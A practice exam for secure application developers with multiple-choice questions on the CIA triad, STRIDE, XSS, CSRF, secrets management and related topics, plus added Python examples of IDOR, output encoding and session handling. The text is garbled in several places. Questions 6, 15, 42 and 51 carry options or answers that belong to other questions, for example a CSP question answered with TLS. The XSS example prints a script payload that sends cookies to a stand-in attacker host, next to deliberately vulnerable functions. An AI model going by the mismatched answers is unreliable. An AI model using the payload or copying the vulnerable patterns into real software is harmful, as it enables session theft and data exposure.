A practice exam for secure application developers, covering key concepts such as the CIA triad, least privilege, fail securely, STRIDE, privacy by design, and more. It includes questions and detailed explanations to help developers understand and apply security principles in their work. The exam covers topics like threat modeling, secure microservices architecture, data encryption, SAST, SQL injection prevention, XSS, secure password storage, CSRF tokens, and defense in depth. It also addresses IaC, security gates in CI/CD pipelines, secret management, WAFs, penetration testing, environment segregation, and security misconfigurations.
Typology: Exams
Question 1. What is the primary goal of the CIA triad in information security?
A) Ensuring data is encrypted at all times
B) Protecting Confidentiality, Integrity, and Availability of data
C) Preventing all types of cyber attacks
D) Managing user privileges effectively
Answer: B) Protecting Confidentiality, Integrity, and Availability of data
Explanation: The CIA triad names the three core security objectives: data is disclosed only to authorized parties (confidentiality), is not altered without authorization (integrity), and is accessible when needed (availability). Encryption is one control that serves confidentiality, not the goal itself.

Question 2. Which security principle advocates for assigning the minimum permissions necessary for a component or user?
A) Defense in Depth
B) Least Privilege
C) Complete Mediation
D) Separation of Duties
Answer: B) Least Privilege
Explanation: Least Privilege grants each user, process, or component only the rights its task requires, so a compromised account or a bug in one component can do limited damage.

Question 3. What does "Fail Securely" mean in security design principles?
A) The system always shuts down upon failure
B) The system defaults to a secure, restricted state when failures occur
C) Failures are ignored to maintain availability
D) Failures are logged but do not impact security
Answer: B) The system defaults to a secure, restricted state when failures occur
Explanation: Fail Securely means an error path must not grant more access than the success path: an exception in an authorization check should deny the request, not fall through to it, so failures never widen the attack surface.

Question 4. Which model is used to systematically identify threats by categorizing potential security issues?
A) DREAD
B) STRIDE
C) PASTA
D) CMMI
Answer: B) STRIDE
Explanation: STRIDE categorizes threats as Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. DREAD is a risk-rating scheme applied to threats once found, and PASTA is a broader risk-centric threat-modeling process.

Question 5. Which of the following is a key aspect of Privacy by Design (PbD)?
A) Encrypting all data at rest only
B) Incorporating privacy considerations from the start of development
C) Implementing strict access controls after deployment
D) Removing personal data from the system
Answer: B) Incorporating privacy considerations from the start of development
Explanation: PbD embeds privacy measures in the design phase, including data minimization and purpose specification, rather than bolting them on after deployment.

Question 6. In threat modeling, what is the purpose of Data Flow Diagrams (DFD)?
A) To visualize system architecture
B) To map data movement and identify trust boundaries
C) To document user requirements
D) Fuzzing APIs for unexpected behavior
Answer: B) Analyzing source code without executing it for vulnerabilities
Explanation: SAST examines source code statically to identify security flaws early in development, before the application is built or deployed.

Question 10. Which of the following is an effective way to prevent SQL injection attacks?
A) Using stored procedures and parameterized queries
B) Disabling database logging
C) Avoiding input validation
D) Using plain string concatenation in queries
Answer: A) Using stored procedures and parameterized queries
Explanation: Parameterized queries send user-supplied values to the database separately from the SQL text, so the input can never change the structure of the statement. Stored procedures help only when they also bind parameters; a procedure that assembles dynamic SQL from its arguments is just as injectable.

Question 11. How does Cross-Site Scripting (XSS) typically occur?
A) When user input is stored unescaped in output and executed as code
B) When SQL queries are improperly sanitized
C) When session tokens are stolen
D) When insecure cookies are used
Answer: A) When user input is stored unescaped in output and executed as code
Explanation: XSS occurs when untrusted input is placed into a page without output encoding for its context, so the browser executes attacker-supplied script. Stored XSS persists the payload server-side and serves it to every visitor; reflected XSS returns it in the immediate response.

Question 12. Which of the following is a recommended practice for secure password storage?
A) Storing passwords in plain text
B) Using slow hashing algorithms like bcrypt or Argon2 with salts
C) Encrypting passwords with symmetric encryption
D) Hashing passwords with MD
Answer: B) Using slow hashing algorithms like bcrypt or Argon2 with salts
Explanation: A per-password random salt defeats precomputed (rainbow) tables and stops identical passwords from producing identical hashes; a deliberately slow, tunable algorithm makes offline brute force expensive. Reversible encryption leaves every password exposed if the key leaks, and fast general-purpose hashes can be tried billions of times per second.

Question 13. What is the purpose of implementing Cross-Site Request Forgery (CSRF) tokens?
A) To authenticate users
B) To prevent unauthorized commands transmitted from authenticated users
C) To encrypt user data
D) To prevent SQL injection
Answer: B) To prevent unauthorized commands transmitted from authenticated users
Explanation: A CSRF token is an unpredictable value tied to the user's session that a third-party site cannot read. A forged cross-site request arrives carrying the victim's cookies but not a valid token, so the server rejects it. The token does not authenticate the user; the session does.

Question 14. Which security principle involves validating every access attempt to resources?
A) Least Privilege
B) Complete Mediation
C) Defense in Depth
D) Separation of Duties
Answer: B) Complete Mediation
Explanation: Complete Mediation requires that every access to every object is checked against policy at the time of access, rather than relying on a decision cached from an earlier request, so checks cannot be bypassed.

Question 15. Which technique helps detect vulnerabilities early by analyzing source code before deployment?
A) Penetration testing
B) Dynamic analysis
B) Storing secrets in environment variables
C) Using secret management tools like HashiCorp Vault
D) Using plain text files on servers
Answer: C) Using secret management tools like HashiCorp Vault
Explanation: Secret management tools provide encrypted storage, fine-grained access control, rotation, and an audit trail for credentials. Environment variables are readable by any process running as the same user and often leak into logs and crash dumps.

Question 19. What is the main purpose of a Web Application Firewall (WAF)?
A) To block all incoming traffic
B) To filter, monitor, and block malicious HTTP traffic
C) To encrypt data in transit
D) To replace secure coding practices
Answer: B) To filter, monitor, and block malicious HTTP traffic
Explanation: A WAF inspects HTTP requests and responses for attack patterns such as SQL injection and XSS and blocks or logs them. It is a compensating control placed in front of the application, not a substitute for fixing the code behind it.

Question 20. Which testing method involves simulating a malicious attacker to evaluate security controls?
A) Static testing
B) Manual code review
C) Penetration testing
D) Fuzzing
Answer: C) Penetration testing
Explanation: Penetration testing actively attempts to exploit vulnerabilities the way an attacker would, to assess the real security posture rather than the theoretical one.

Question 21. Why is environment segregation important in secure software development?
A) To increase development speed
B) To prevent test data from affecting production systems
C) To enable sharing of resources
D) To reduce costs
Answer: B) To prevent test data from affecting production systems
Explanation: Separate development, test, and production environments ensure that testing activities, weaker test configurations, and test credentials cannot reach or disrupt live systems and data.

Question 22. What does "Security Misconfiguration" typically involve?
A) Using default passwords and open ports
B) Properly securing all resources
C) Implementing least privilege
D) Encrypting all data
Answer: A) Using default passwords and open ports
Explanation: Misconfigurations such as default credentials, unnecessary open services, verbose error pages, and disabled security headers expose systems to attack without any flaw in the application code.

Question 23. Which principle emphasizes having multiple layers of security to protect assets?
A) Least Privilege
B) Defense in Depth
C) Complete Mediation
D) Separation of Duties
Answer: B) Defense in Depth
Explanation: Defense in Depth layers independent controls so that if one fails or is bypassed, others still protect the asset.
Question 27. Which is an example of a data protection mechanism at rest?
A) TLS encryption
B) Disk encryption or database encryption
C) Input validation
D) Session tokens
Answer: B) Disk encryption or database encryption
Explanation: Data-at-rest protection encrypts stored data (volumes, files, or database columns) so that a stolen disk or backup does not expose it. TLS protects data in transit only.

Question 28. Why should test environments avoid using production data?
A) To save storage space
B) To prevent exposure of sensitive information
C) To speed up testing
D) To simplify setup
Answer: B) To prevent exposure of sensitive information
Explanation: Test environments are typically less protected and more widely accessible; using sanitized or synthetic data keeps real personal and business data out of them.

Question 29. Which vulnerability involves unauthorized access to objects or resources by manipulating identifiers?
A) Injection
B) Cross-Site Scripting
C) Insecure Direct Object Reference (IDOR)
D) Buffer Overflow
Answer: C) Insecure Direct Object Reference (IDOR)
Explanation: IDOR, a form of broken access control, occurs when the application looks up a resource by a client-supplied identifier without checking that the current user is authorized for that specific object, so changing the identifier yields someone else's data.
Question 30. What is a key benefit of using multi-factor authentication (MFA)?
A) It simplifies login processes
B) It adds an extra layer of security beyond passwords
C) It replaces the need for passwords
D) It reduces server load
Answer: B) It adds an extra layer of security beyond passwords
Explanation: MFA requires a second, independent factor (something you have or are), so a stolen or phished password alone is not enough to log in.

Question 31. Which is a common OWASP Top 10 vulnerability related to improper session management?
A) Injection
B) Broken Authentication and Session Management
C) Cross-Site Scripting
D) Security Misconfiguration
Answer: B) Broken Authentication and Session Management
Explanation: This is the category name from the 2013 OWASP Top 10; later editions call it Broken Authentication (2017) and Identification and Authentication Failures (2021). Weak session handling, such as predictable identifiers, no expiry, or no rotation after login, enables session hijacking and impersonation.

Question 32. What is the purpose of "complete mediation" in secure design?
A) To cache access control decisions
B) To validate every access attempt to resources
C) To allow temporary access
D) To bypass security checks for performance
Answer: B) To validate every access attempt to resources
Explanation: Complete Mediation ensures that each access is checked against policy at the time it happens; a cached or once-only decision can be circumvented after permissions change.
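Questions 29 and 32 both come down to the same check: authorize the current user against the specific object on every access, not just filter a list once. The following is an added example, not from the exam, with constructed invoice records and an assumed rule that a record is readable by its owner or by an administrator. The IDOR-prone version is shown alongside the mediated one.

```python
# Added example (not from the exam): object-level authorization evaluated on every
# fetch, contrasted with the IDOR-prone version that trusts the identifier alone.
# Data, user ids and the owner-or-admin rule are constructed for this example.
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Invoice:
    invoice_id: int
    owner_id: int
    amount: int


# Constructed sample data: invoices belonging to two different users.
INVOICES = {
    1001: Invoice(1001, owner_id=7, amount=120),
    1002: Invoice(1002, owner_id=9, amount=980),
}

ADMINS = {42}  # user ids allowed to read any invoice


class Forbidden(Exception):
    """Raised for both 'does not exist' and 'not yours' so valid ids cannot be enumerated."""


def get_invoice_vulnerable(invoice_id: int) -> Invoice:
    """IDOR: any authenticated user who guesses an id gets the record."""
    return INVOICES[invoice_id]


def list_invoices(current_user_id: int) -> List[Invoice]:
    """Filtered listing. Necessary but not sufficient: the detail endpoint must
    still check, because an id can be typed in without ever using this list."""
    return [inv for inv in INVOICES.values() if inv.owner_id == current_user_id]


def get_invoice(current_user_id: int, invoice_id: int) -> Invoice:
    """Complete mediation: authorization is evaluated on this access, against this
    object, using the server-side identity, not a decision cached from list_invoices."""
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        raise Forbidden()
    if current_user_id != invoice.owner_id and current_user_id not in ADMINS:
        raise Forbidden()
    return invoice


def can_read(current_user_id: int, invoice_id: int) -> bool:
    """Boolean wrapper around get_invoice for callers that want a yes/no answer."""
    try:
        get_invoice(current_user_id, invoice_id)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    print(get_invoice_vulnerable(1002))   # user 7 can read user 9's invoice
    print(can_read(7, 1002))              # False: the mediated path refuses
    print(can_read(42, 1002))             # True: admin
```

The identity used in the check must come from the server-side session, never from a request parameter, and the check must live in the data-access path so that every route reaching the object goes through it.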
Question 36. Which type of testing involves analyzing dependencies for known vulnerabilities?
A) Static analysis
B) Software Composition Analysis (SCA)
C) Penetration testing
D) Fuzz testing
Answer: B) Software Composition Analysis (SCA)
Explanation: SCA tools inventory third-party libraries and match them against known-vulnerability databases; SAST looks at your own code, not at the versions you depend on.

Question 37. How does "defense in depth" improve security?
A) By reducing costs
B) By layering multiple security controls to protect assets
C) By simplifying security architecture
D) By relying solely on firewalls
Answer: B) By layering multiple security controls to protect assets
Explanation: Multiple overlapping, independent controls mean the failure or bypass of any single measure does not lead directly to compromise.

Question 38. Which security best practice involves checking every resource access attempt?
A) Least Privilege
B) Complete Mediation
C) Defense in Depth
D) Separation of Duties
Answer: B) Complete Mediation
Explanation: Complete Mediation requires validation of every access request at the time it is made.

Question 39. Why are secrets management tools essential in DevSecOps?
A) To facilitate user onboarding
B) To securely store and control access to sensitive data like API keys
C) To replace encryption
D) To automate code reviews
Answer: B) To securely store and control access to sensitive data like API keys
Explanation: Secrets management tools keep credentials out of source code and pipeline definitions, enforce access policies, support rotation, and record who retrieved what.

Question 40. What is a common security misconfiguration that can lead to vulnerabilities?
A) Leaving default passwords in place
B) Applying patches timely
C) Using secure protocols
D) Disabling unnecessary services
Answer: A) Leaving default passwords in place
Explanation: Default passwords are published in vendor documentation and attacker wordlists, so any service still using one can be accessed without any exploit.

Question 41. Which security testing approach analyzes the application's source code for vulnerabilities before execution?
A) Fuzz testing
B) Static Application Security Testing (SAST)
C) Penetration testing
D) Runtime monitoring
Answer: B) Static Application Security Testing (SAST)
Explanation: SAST examines source code statically to find security flaws early, before the code runs.

Question 42. What is the main purpose of a Content Security Policy (CSP)?
A) Data encryption with TLS
B) Data masking
C) Data anonymization
D) Data backups
Answer: A) Data encryption with TLS
Explanation: TLS encrypts and authenticates data in transit, preventing interception and tampering on the network.

Question 46. Which vulnerability is addressed by implementing proper input validation?
A) SQL injection
B) Buffer overflow
C) Cross-Site Scripting (XSS)
D) All of the above
Answer: D) All of the above
Explanation: Validation rejects input that does not match the expected type, length, and format, which reduces the attack surface for all three. It is a first layer, not the whole defense: parameterized queries for SQL injection, bounds checking for overflows, and contextual output encoding for XSS are still required.

Question 47. What is the purpose of a penetration test?
A) To analyze source code
B) To simulate attacks and identify vulnerabilities
C) To scan networks for open ports
D) To validate security policies
Answer: B) To simulate attacks and identify vulnerabilities
Explanation: Penetration tests actively attempt to exploit vulnerabilities to show what an attacker could actually achieve against the deployed system.

Question 48. Why is environment segregation crucial for secure software development?
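Questions 11 and 46 together describe the two controls against XSS: allow-list validation where the input has a known shape, and contextual output encoding where it does not. The following is an added example, not from the exam: a display-name validator with an assumed allow-list, an HTML-body renderer that escapes at output time, and the deliberately vulnerable renderer it replaces. The payload is constructed for the demonstration.

```python
# Added example (not from the exam): allow-list input validation for a display name
# plus HTML output encoding for free text, the pair of controls that stops reflected
# and stored XSS. Encoding happens at render time for the HTML-body context, never
# at storage time, so the stored value stays usable in other contexts (JSON, email).
import html
import re

# Assumed allow-list for this example: 3-32 chars of letters, digits, space, . _ -
DISPLAY_NAME_RE = re.compile(r"[A-Za-z0-9 ._-]{3,32}")


def is_valid_display_name(value: str) -> bool:
    """Allow-list check: anything outside the expected shape is rejected outright."""
    return DISPLAY_NAME_RE.fullmatch(value) is not None


def validate_display_name(value: str) -> str:
    if not is_valid_display_name(value):
        raise ValueError("display name has a disallowed character or length")
    return value


def render_comment(author: str, body: str) -> str:
    """Encode every untrusted value for the HTML-body context. The body is free
    text (a user may legitimately type '<'), so encoding, not rejection, is the control."""
    return '<p class="comment"><b>%s</b>: %s</p>' % (
        html.escape(author, quote=True),
        html.escape(body, quote=True),
    )


def render_comment_vulnerable(author: str, body: str) -> str:
    """Deliberately vulnerable: raw interpolation, the pattern behind stored XSS."""
    return '<p class="comment"><b>%s</b>: %s</p>' % (author, body)


# Constructed payload: a cookie-exfiltration script of the kind a stored XSS carries.
PAYLOAD = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    print(render_comment_vulnerable("alice", PAYLOAD))  # browser would run the script
    print(render_comment("alice", PAYLOAD))             # shown as harmless text
```

html.escape with quote=True covers the HTML-body and quoted-attribute contexts; a value placed inside a script block, a URL, or a CSS rule needs the encoder for that context instead. Validation alone would not help the comment body, which is why the example does not try to allow-list it.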
A) To improve development speed
B) To prevent testing activities from affecting production data and systems
C) To reduce infrastructure costs
D) To facilitate collaboration
Answer: B) To prevent testing activities from affecting production data and systems
Explanation: Isolating environments keeps test credentials, test traffic, and weaker test configurations away from live data and systems, preserving both privacy and integrity.

Question 49. Which practice helps ensure that applications are resilient to security misconfigurations?
A) Regular security audits and configuration reviews
B) Ignoring default settings
C) Disabling security features
D) Using the same configuration across all environments
Answer: A) Regular security audits and configuration reviews
Explanation: Regular audits and automated configuration checks identify drift and insecure defaults before an attacker finds them.

Question 50. Which of the following is a best practice for managing application secrets?
A) Hardcoding secrets in source code
B) Using environment variables without access controls
C) Using dedicated secret management tools with access policies
D) Storing secrets in version control
Answer: C) Using dedicated secret management tools with access policies
Explanation: Secret management tools provide encrypted storage, access control, rotation, and auditing; secrets committed to version control persist in history even after removal.

Question 51. How does a WAF help in securing web applications?
A) By encrypting all data
C) By ignoring errors
D) By allowing all access during failures
Answer: B) By defaulting to a secure state during failures
Explanation: Ensuring that failures deny rather than grant access keeps the system secure even when errors occur.

Question 55. Which security principle involves requiring multiple individuals to complete high-risk tasks?
A) Least Privilege
B) Separation of Duties (SoD)
C) Defense in Depth
D) Complete Mediation
Answer: B) Separation of Duties (SoD)
Explanation: SoD splits a sensitive operation across multiple parties so that no single person can carry out fraud or a damaging change alone.

Question 56. Which security measure is most effective in preventing session hijacking?
A) Using secure, random, and time-limited session tokens
B) Disabling cookies
C) Storing sessions in local storage
D) Using HTTP instead of HTTPS
Answer: A) Using secure, random, and time-limited session tokens
Explanation: Session identifiers must be unpredictable (generated from a cryptographic random source), expire after inactivity, be rotated after authentication, and travel only over HTTPS in cookies flagged Secure and HttpOnly. Local storage is readable by any script on the page, and plain HTTP exposes the token on the network.

Question 57. What is the purpose of input sanitization?
A) To encrypt data
B) To prevent malicious input from causing harm
C) To improve performance
D) To store data securely
Answer: B) To prevent malicious input from causing harm
Explanation: Sanitization removes or neutralizes characters that would be interpreted as code by a downstream parser, reducing injection risk; encoding for the target output context is generally preferred to stripping, because stripping changes the user's data.

Question 58. Which security testing method involves analyzing application behavior during actual use?
A) Static analysis
B) Fuzzing
C) Manual testing
D) Dynamic testing
Answer: D) Dynamic testing
Explanation: Dynamic testing (DAST) exercises the running application and observes its behavior to identify vulnerabilities; fuzzing is one dynamic technique that feeds malformed input.

Question 59. Why is it important to implement proper access control on every resource?
A) To simplify development
B) To prevent unauthorized access and privilege escalation
C) To improve performance
D) To comply with GDPR
Answer: B) To prevent unauthorized access and privilege escalation
Explanation: Proper access controls ensure users can only reach the resources and operations they are authorized for; a single unchecked endpoint is enough for escalation.

Question 60. Which of the following best describes "least privilege"?
A) Giving users full access to all systems
B) Assigning only the permissions necessary for tasks
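Questions 13 and 56 both rest on the same server-side session machinery: a random, expiring session identifier and a per-session CSRF token that a cross-site request cannot supply. The following is an added example, not from the exam, that implements both in one in-memory store; the dictionary stands in for a database or cache, the clock is injectable so expiry can be tested, and the 15-minute inactivity limit is an assumption. A real deployment would also set the session cookie with the Secure, HttpOnly and SameSite attributes.

```python
# Added example (not from the exam): a server-side session store issuing random,
# expiring session ids, plus a synchronizer CSRF token bound to the session and
# compared in constant time. The in-memory dict and the TTL are assumptions.
import hmac
import secrets
import time
from typing import Optional

SESSION_TTL = 15 * 60  # seconds of inactivity after which a session is invalid


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock           # injectable for testing expiry
        self._sessions = {}           # session_id -> {user_id, csrf, expires}

    def create(self, user_id: int) -> str:
        """Issue a 256-bit id from the OS CSPRNG; never derived from user data."""
        session_id = secrets.token_urlsafe(32)
        self._sessions[session_id] = {
            "user_id": user_id,
            "csrf": secrets.token_urlsafe(32),
            "expires": self._clock() + SESSION_TTL,
        }
        return session_id

    def get(self, session_id: str) -> Optional[dict]:
        """Return the session if it exists and has not expired; purge it otherwise."""
        sess = self._sessions.get(session_id)
        if sess is None:
            return None
        if self._clock() > sess["expires"]:
            del self._sessions[session_id]
            return None
        sess["expires"] = self._clock() + SESSION_TTL  # sliding inactivity window
        return sess

    def rotate(self, old_session_id: str) -> Optional[str]:
        """Re-issue the id (and CSRF token) after login or a privilege change so a
        value planted before authentication (session fixation) is worthless."""
        sess = self.get(old_session_id)
        if sess is None:
            return None
        del self._sessions[old_session_id]
        new_id = secrets.token_urlsafe(32)
        sess["csrf"] = secrets.token_urlsafe(32)
        self._sessions[new_id] = sess
        return new_id

    def csrf_token(self, session_id: str) -> Optional[str]:
        """Value to embed in forms; a third-party origin cannot read it."""
        sess = self.get(session_id)
        return sess["csrf"] if sess else None

    def check_csrf(self, session_id: str, submitted: Optional[str]) -> bool:
        """Reject state-changing requests whose token is missing or does not match."""
        sess = self.get(session_id)
        if sess is None or not submitted:
            return False
        return hmac.compare_digest(sess["csrf"], submitted)


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create(user_id=7)
    token = store.csrf_token(sid)
    print(store.check_csrf(sid, token))     # True: token came from the session
    print(store.check_csrf(sid, "forged"))  # False: cross-site request without it
```

The CSRF check only protects requests that also require the session cookie; a forged request from another origin carries the cookie automatically but cannot include the token, which is exactly the gap it closes.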